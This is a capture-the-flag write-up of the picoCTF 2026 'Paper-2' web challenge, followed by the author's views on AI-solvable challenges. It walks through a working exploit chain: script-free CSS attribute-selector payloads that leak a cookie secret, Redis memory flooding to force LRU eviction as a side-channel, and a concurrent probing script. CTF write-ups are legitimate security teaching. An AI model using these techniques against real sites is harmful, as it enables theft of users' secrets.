Foreword
PicoCTF is one of the largest CTFs that takes place every year in March. It's run by Carnegie Mellon University and caters to all difficulty levels. Pico was one of the first large CTFs I ever played, and being able to place top 3 in the US HS/MS bracket is a dream come true.
However, this year was one of the weakest years of PicoCTF, as everything was "sloppable" or easily solved by AI. If you'd like to skip straight to my thoughts on the competition, check out Addressing the slop below.
Despite everything being AI-solvable, ehhthing managed to make another extremely difficult challenge. If you're not familiar, ehhthing is the creator of two notoriously hard challenges from previous years of PicoCTF:
secure-email-service (2025): Inject headers to get the admin to sign and send your XSS payload, then steal the flag.
elements (2024): Craft a valid XSS element chain in the game to execute JS, then bypass the strict CSP and leak the flag via a side-channel/timing-based exfiltration.
Below is my writeup on how my team (me, Mr-MPH, JT314, S3af, Programmer_user) solved the hardest challenge in the event.
Paper-2
picoCTF{i_l1ke_frames_on_my_canvas_[REDACTED]}We are provided source for this challenge:
The file structure is standard for a Bun application; nothing actually important here.
This challenge is a sequel to Paper-1, where you had to use CSS selectors to conditionally render <object> tags in the DOM, then count visible frames with JavaScript to binary-search each secret chars without network exfiltration.
Understanding index.ts
This file contains all the program's logic, but only a few sections are crucial to understanding the challenge's constraints.
Content Security Policy (CSP)
Content Security Policy (CSP) is a browser security mechanism that prevents what content can be executed or loaded on a page.
4 collapsed linesconst headers = (type: string) => {
return {
headers: {
'Content-Type': type,
'Content-Security-Policy': [
"default-src 'self' 'unsafe-inline'",
"script-src 'none'"
5 collapsed lines ].join('; '),
'X-Content-Type-Options': 'nosniff'
}
}
}All responses use CSP which eliminates all JavaScript execution vectors. This is a major constraint to take note of as we can't use fetch, XHR, eval, or event handlers to exfil data.
Bot Execution
const visit = async (url: string) => {
5 collapsed lines await redis.set('browser_open', 'true');
const secret = randomBytes(16).toString('hex');
let browser: Browser | null = null;
const userDataDir = await mkdtemp(join(tmpdir(), 'paper-'));
try {
browser = await puppeteer.launch({
executablePath: '/usr/bin/google-chrome',
2 collapsed lines args: [
'--no-sandbox',
'--disable-gpu',
'--js-flags=--noexpose_wasm,--jitless',
'--host-rules="MAP paper.local 127.0.0.1"'
7 collapsed lines ],
headless: true,
pipe: true,
userDataDir
});
await browser.setCookie({
name: 'secret',
value: secret,
domain: host,
sameSite: 'Strict'
5 collapsed lines });
const page = await browser.newPage();
await redis.set('secret', secret, 'EX', 60);
await page.goto(url);
await Bun.sleep(61000);
} catch(e) {}
await redis.del('secret');
await redis.del('browser_open');
}This is where the challenge larps as a victim. More specifically it:
- Generates a fresh 32-char secret each time
- Stores it in Redis (60s TTL) and injects it into a Chrome instance cookie
- The bot then visits to the attacker's URL and sleeps for 61 seconds
- After the 61-second nap is done, the secret is deleted from Redis and the
browser_openflag is cleared - Each subsequent visit then gets a completely NEW secret, there is no persistance what so ever.
File Uploading
'/upload': {
5 collapsed lines POST: async (req: BunRequest): Promise<Response> => {
const file = form.get('file');
if (!file || !(file instanceof File) || !file.size || file.size > 2 ** 16) {
return new Response('no file upload!', headers('text/plain'));
}
const id = await redis.incr('current-id');
const data = JSON.stringify([file.type, (await file.bytes()).toBase64()]);
1 collapsed line await redis.set(`file|${id}`, data, 'EX', 10 * 60);
return Response.redirect(`/paper/${id}`);
}
},The program accepts arbitrary file uploads up to 64KB. Files are then stored in Redis with a 10-minute TTL.
Another key thing to note is there is no limit to files you can upload.
File Serving
'/paper/:id': async (req: BunRequest<'/paper/:id'>): Promise<Response> => {
const res = await redis.get(`file|${req.params.id}`);
1 collapsed line if (!res) return new Response('not found!', headers('text/plain'));
const [type, data] = JSON.parse(res) as [string, string];
return new Response(Buffer.from(data, 'base64'), headers(type));
},This serves the uploaded files to the bot (keep in mind CSP still matters). This means even if you upload HTML or JS files, they can't run because of script-src 'none' policy. However, CSS files are still evaluated and CSS has more power than you might think (foreshadowing).
Secret Exposure
'/secret': async (req: BunRequest): Promise<Response> => {
const secret = req.cookies.get('secret') || '0123456789abcdef'.repeat(2);
const payload = new URL(req.url, 'http://127.0.0.1').searchParams.get('payload') || '';
return new Response(
`<body secret="${secret}">${secret}\n${payload}</body>`,
headers('text/html')
);
},This returns HTML with the secret placed in the body attribute: <body secret="...">.
The main issue here is you cannot read this attribute with JavaScript (CSP blocks it).
Flag Submission
'/flag': async (req: BunRequest): Promise<Response> => {
const guess = new URL(req.url, 'http://127.0.0.1').searchParams.get('secret');
2 collapsed lines const secret = await redis.getdel('secret');
if (secret && secret === guess) {
return new Response(Bun.env.FLAG || 'picoctf{flag}', headers('text/plain'));
}
return new Response('wrong', headers('text/plain'));
},This checks if your secret is correct against the stored value using getdel(), which atomically (holy vocab larp) retrieves and deletes the secret in one move. If you guess wrong, the secret is instantly deleted which means you can only call /flag once.
This is another critical constraint as we must figure the entire 32 char secret perfectly in one submission.
Bot Trigger
'/visit/:id': async(req: BunRequest<'/visit/:id'>): Promise<Response> => {
1 collapsed line if (await redis.get('browser_open')) return new Response('browser still open!');
const res = await redis.get(`file|${req.params.id}`);
1 collapsed line if (!res) return new Response('not found!', headers('text/plain'));
visit(`https://${host}/paper/${req.params.id}`);
return new Response('visiting!', headers('text/plain'));
}This starts a bot and sends it to load the specified file. browser_open ensures only one bot instance runs at a time and if you call /visit/:id twice, the second call will be rejected.
So that also adds on to the fact that we have to wait ~61 seconds (the bot sleep time) between attempts. And once again each visit generates a new secret and provides one 61-second window to leak information.
The Constraint Landscape
Now this is a lot of information to process, let's summarize the key constraints:
Execution:
- JS is completely blocked by CSP
- CSS can be evalled
- Each bot visit lasts exactly 61 seconds
- Only one bot can run at a time (~61 second gaps between visits)
- Secrets are generated fresh for each visit
Flag Submission:
- You MUST guess the full 32-char secret in one attempt
- Wrong guess == secret nuked (via
getdel()func) - 32 hex chars is 16^32 ≈ 1.2 × 10^38 possibilities rendering brute force impossible
Resource:
- Files stay in Redis for 10 minutes
- You can upload unlimited test files
- Redis is the shared cache for all visited
Quick Detour
services:
redis:
image: redis:7-alpine
command: redis-server --maxmemory 512M --maxmemory-policy allkeys-lru --save "" --appendonly no
web:
build: .
init: true
ports:
- 8443:443The main issue is CSP is brutal, literally nothing executes but CSS. But the docker-compose does give us something useful: allkeys-lru.
allkeys-lru (Least Recently Used) is a Redis eviction policy. When the 512MB limit is reached, Redis automatically deletes the least recently accessed items. "Recently accessed" = accessed within the time window; old accesses go away.
The Realization
Remember how CSP blocks all JavaScript but CSS still gets evaluated? And the /secret endpoint places the secret directly in the HTML as <body secret="...">?
CSS has attribute selectors - [secret^="a"] (starts with), [secret$="f"] (ends with), and [secret*="abc"] (contains). This means we can conditionally load resources based on the secret's value. If we upload a marker file to Redis and write CSS like this:
body[secret*="abc"] { background-image: url(/paper/123); }The bot will only fetch /paper/123 if "abc" actually appears in the secret. That redis.get() call makes the key "recently accessed." If the selector doesn't match, the file never gets requested and sits untouched in Redis.
So we now have a way to check if any short string exists inside the secret, all without a single line of JavaScript.
CSS as an Oracle
The naive approach is one selector per char per position (e.g body[secret^="a"], body[secret^="b"], etc.) But that only leaks one char per bot visit, and with 32 chars and 61-second windows, that's ~30 minutes of time we do NOT have. We need to go wider.
The first thing we tried was dumping all our selectors into one background rule:
body[secret*="abc"] { background: url('/paper/marker_abc'); }
body[secret*="abd"] { background: url('/paper/marker_abd'); }
body[secret*="abe"] { background: url('/paper/marker_abe'); }However this didn't work as CSS background only applies one value and if multiple selectors match, the last one wins and only that one marker gets loaded. We need every matching selector to fire by itself.
We can fix this by making it so each selector sets a CSS custom property to a url(), and a trigger element references all of them. Only the variables that got set cause HTTP requests:
body[secret*="abc"] { --m_abc: url('/paper/marker_abc'); }
body[secret*="abd"] { --m_abd: url('/paper/marker_abd'); }
body[secret*="abe"] { --m_abe: url('/paper/marker_abe'); }
/* trigger element loads all matched markers */
#t { background-image: var(--m_abc, none), var(--m_abd, none), var(--m_abe, none); }CSS custom properties (aka CSS variables) are values you define with --name and reference with var(--name, fallback). The key actions here: if the variable was never set (because the selector didn't actually match), var() falls back to none which means there was no HTTP request. This lets us have thousands of selectors without them clobbering each other.
So now every matching selector will independently trigger a fetch. With that problem finished, we can test way more than single chars:
- Trigrams (
body[secret*="abc"]) - every 3-char hex combo that appears anywhere in the secret. So about ~30 overlapping trigrams can reconstruct the entire 32-char secret. - Bigrams (
body[secret*="ab"]) - this is more coarse but more reliable, we fills gaps where trigram output isn't very strong - Prefix/suffix (
body[secret^="ab"],body[secret$="ef"]) - this appends to the start and end, which*=(contains) selectors alone can't differentiate - Controls -
body[secret](this always matches, since the attribute exists) andbody[secret*="ggg"](never matches asgisn't a hex char). This is important to reduce the noise.
So now each marker gets replicated 3× to reduce variance which is about ~5,000 total markers in Redis. We then bundle them into CSS files (about ~220 selectors each to keep below 64KB upload limit) and then chain it all together with a launcher HTML file:
<html>
<head>
<link rel="stylesheet" href="/paper/css_bundle_0">
<link rel="stylesheet" href="/paper/css_bundle_1">
<!-- ... ~25 CSS bundles -->
</head>
<body>
<div id="trig0" style="width:1px;height:1px"></div>
<div id="trig1" style="width:1px;height:1px"></div>
<!-- one trigger div per bundle -->
</body>
</html>This now introduces a new probles: the bot visits /paper/:id, not /secret. So the secret attribute only exists on the /secret endpoint. So the launcher uses a meta refresh to redirect to /secret?payload=<link href=...>, which then injects our CSS <link> tags into the secret page via payload. Now the bot evals our CSS like it has <body secret="...">.
Cache Eviction as a Side-Channel
Our teammate s3af kept talking about a side-channel vuln (which never existed) when we were looking for vulns, so it was quite funny to me that there was a side-channel element in this challenge
The cache eviction element has two phases:
-
Before triggering the bot, we prefill Redis with 4,200 garbage files (each ~65KB) to push memory close to the 512MB limit in redis. This means our markers and CSS bundles will be competing for space, so when we re-upload the CSS bundles and launcher after the prefill,they don't get evicted before the bot even visits.
-
Now we trigger the bot. The bot visits our launcher, the CSS evals, and the matching markers get fetched (which makes them "recently accessed"). After waiting ~10 seconds for the CSS to fully eval, we hit Redis with a second wave of 1,400 more garbage files. This tips Redis over the edge and forces Redis to perform LRU eviction. The untouched markers AKA the ones whose selectors didn't match will get evicted first.
Then we probe every marker. So we blast all ~5,000 with concurrent requests and 200 means it survived, 404 means evicted:
def probe_markers(base, markers, workers=900, timeout=2):
def check(m):
r = session.get(f"{base}/paper/{m.paper_id}", timeout=timeout)
return m if r.status_code == 200 and r.content != b"not found!" else None
with ThreadPoolExecutor(max_workers=workers) as ex:
results = ex.map(check, markers)
return [m for m in results if m is not None]Each run gives us around ~50–60 survivors out of thousands. Those survivors are the markers whose CSS selectors also matched the secret.
Reconstructing the Secret
New problem: you can't just take the surviving trigrams and stitch them together as the process of LRU eviction is quite noisy. Some markers survive by luck, and some get evicted despite being touched (which is when they are uploaded early & aged out). In general the process of naive reconstruction produces a LOT of garbage.
Why naive doesn't work
Are you still confused, let me elaborate futher...
Say trigrams abc, bcd, and cde all survived, the secret probably contains abcde. But what if xyz also survived by chance? Now you have a false branch with no way to tell which path is actually real. With 50+ survivors and only 32 chars of secret, there are many spurious (holy membean word) trigrams messing w/ the signal.
And we can't just rerun the attack and intersect results as each bot visit generates a completely new secret. And every run leaks information about a different string.
Control calibration
All of that is why control markers matter. The "always-match" controls will tell us "ok, what does survival look like for a marker that was accessed?" and the "never-match" controls tell us the opposite.
For each control we check how many of its 3 replicas survived:
# build survival histograms for controls
t_hist = [0, 0, 0, 0] # indices 0..3 (replica survival counts)
f_hist = [0, 0, 0, 0]
for ctrl in always_match_controls:
k = sum(1 for r in ctrl.replicas if r in alive_ids)
t_hist[k] += 1
for ctrl in never_match_controls:
k = sum(1 for r in ctrl.replicas if r in alive_ids)
f_hist[k] += 1
# log-likelihood ratio so how much evidence does k survivors provide?
llr = [log(t_hist[k] / sum(t_hist)) - log(f_hist[k] / sum(f_hist))
for k in range(4)]Log-likelihood ratio (LLR) measures how much a piece of evidence supports one hypothesis over another. In this case, if a marker has 3/3 replicas alive and the LLR for k=3 is +2.1 that corroborates that the selector matched. And if it has 0/3 alive and the LLR for k=0 is -1.8, that's pretty strong evidence it didn't. So values near 0 are deemed as inconclusive.
If most "always-match" controls have about 2–3 replicas alive and most "never-match" controls have 0–1, we have a clean run. The LLR table maps any marker's replica survival count directly to a confidence score.
I definitely suggest you look into this, if you didn't understand my explaination!
Age bias
Here is our bajillionth problem: now markers uploaded first sit in Redis longer and are more likely to get evicted regardless of whether they were touched. A marker at index 50 that survives is far more sus than one at index 4,900 that survives so the early one had to beat longer odds.
We bin markers into 24 groups by upload order and then compute the per-bin survival baselines from the controls, then normalize scores so early survivors get boosted up.
After scoring, we then clip all LLR values to ±1.5 so no single marker can over-dominate the final ranking. And prevents one noisy outlier from throwing off the entire construction of the secret.
Beam search
Now with the calibrated scores for every marker, we can assemble 32-chars candidates via beam search (thank you tiktok video!):
Beam search is a heuristic search algorithm that builds solutions step by step, but only keeps the top k most promising candidates (the "beam width") at each step. Unlike brute force (which explores everything) or greedy search (which only keeps the #1), beam search will balence thoroughness with speed. Here we use a beam width of 3,000.
- Seed with all 4,096 possible 3-char hex prefixes, which are scored by their prefix + trigram LLRs
- Extend each candidate by one hex char and adding the new trigram and bigram scores
- Prune to the top 3,000 candidates by combined score
- Repeat allat until we hit 32 chars
- Add suffix scores and then re-rank
if a trigram already appeared earlier in a cand, we penalize extending w/ it again. And w/o this, beam search grabs onto high-scoring trigrams and keeps looping which would produce crap like abcabcabc... instead of the actual secret.
Flag :)
Finally, the program outputs a ranked list of candidates and will submit #1 to /flag and once again since getdel() nukes the secret on any attempt, there is no second chance...

If you wanna check out the full (heavily ai-slopped) solve script, it's here. Note that it takes about ~10 runs for it to work.
CSS attribute selectors leak which substrings exist in the secret by selectively fetching Redis keys. Flood Redis to trigger LRU eviction, probe which markers survived, score with log-likelihood ratios, and beam search the 32-char secret.
Addressing the slop 🗑️
Paper-2 was by far the best challenge in picoCTF 2026. But the rest of the event was disappointing, 69/70 challenges could be solved by just feeding the challenge to an LLM and asking for the flag.
There was a HUGE lack of a difficulty curve; most challenges were either trivial/sloppable or Paper-2. And really it's the fact that authors aren't putting proper effort into LLM-proofing their challenges. The reason ehhthing's challenges consistently resist this is because the vuln isn't contrived.
Overall in the CTF community there's a sense of outrage against AI slop and the fact that everything is sloppable.
As BraydenPikachu put it during DiceCTF 2026 quals, authors made their challenges using AI (can't quote perfectly), ChatGPT will save that information which allows it to solve that same AI-made challenge 10x faster, and it's a never-ending cycle. This further pushes the fact that yes, we can have beginner-friendly competitions, but we also must combat slop by actually making the challenges.
The issue isn't THAT bad
Many people were clowning on DiceCTF on X/Twitter because a lot of the challenges were sloppable, and yes that's an issue, but there were still some unsolved ones which made the difference between top 10 on the leaderboard. Those challenges were Kernel Pwn, hard blockchain, etc. and they still require a huge skill diff. It's not over just yet for CTFs.
I also think there need to be changes in what the motivations for CTFs are.
Auto Solvers
PicoCTF did introduce me to the idea of making a proper autosolver. For example, C-Bass's team Cosmic Bit Flip took 1st with their autosolver.

I was so utterly impressed with this yet saddened that CTF had come to this, but props to C-Bass for making a pretty well-designed autosolver against picoCTF. They genuinely deserved first for out-strategizing me and my qAgent (blog on that soon lol)
Closing thoughts
Genuinely, shout-out to my goated team. We were working till 3 AM trying to solve. And massive respect to ehhthing for creating challenges that actually make you think instead of AI-larping.
(Three more genuinely's and I would be on the News 😭)
People ask me why I'm so addicted to CTFs and it's things like this that make it beautiful.